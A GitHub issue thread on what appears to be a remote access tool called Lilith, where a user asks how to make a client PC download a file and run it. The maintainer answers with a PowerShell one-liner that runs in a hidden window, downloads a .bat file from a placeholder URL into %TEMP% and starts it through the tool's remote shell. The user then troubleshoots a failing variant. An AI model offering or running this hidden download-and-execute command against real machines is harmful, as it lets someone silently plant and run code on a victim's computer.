### ISSUE TITLE
File download and run

### ISSUE THREAD

**Issue by bondarukid** [werkamsus/Lilith#23]
Hello! Please, help me! I don't now can I using Lilith execute(download file to client PC and run programm)? And how i can do it?

**Comment by werkamsus** [comment]
Google for „powershell script download and run file“, then do remoteControl
pws on Lilith and run that script.

Best regards

Nick

**Comment by werkamsus** [comment]
Something like this should work:
`powershell -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(‘http://PATH_TO_FILE/example.bat’,’%TEMP%\example.bat’); 
Start-Process “%TEMP%\example.bat”`

**Comment by bondarukid** [comment]
I write remoteControl pws and nex step I paste it powershell -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile("https://upload.wikimedia.org/wikipedia/commons/thumb/a/a5/Google_Chrome_icon_%28September_2014%29.svg/800px-Google_Chrome_icon_%28September_2014%29.svg.png","C:\\users\Иван\Desctop/example.png");

and i have message Command 'powershell -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile("https://upload.wikimedia.org/wikipedia/commons/thumb/a/a5/Google_Chrome_icon_%28September_2014%29.svg/800px-Google_Chrome_icon_%28September_2014%29.svg.png","C:\\users\Иван\Desctop/example.png")' was not recognized. What i need to do?

**Comment by werkamsus** [comment]
Remove "powershell -windowstyle hidden" and also dont try to download .svg
to .png, wont render on your desktop.

Regards

**Comment by bondarukid** [comment]
I can't download other files. I get message "was not recognized."
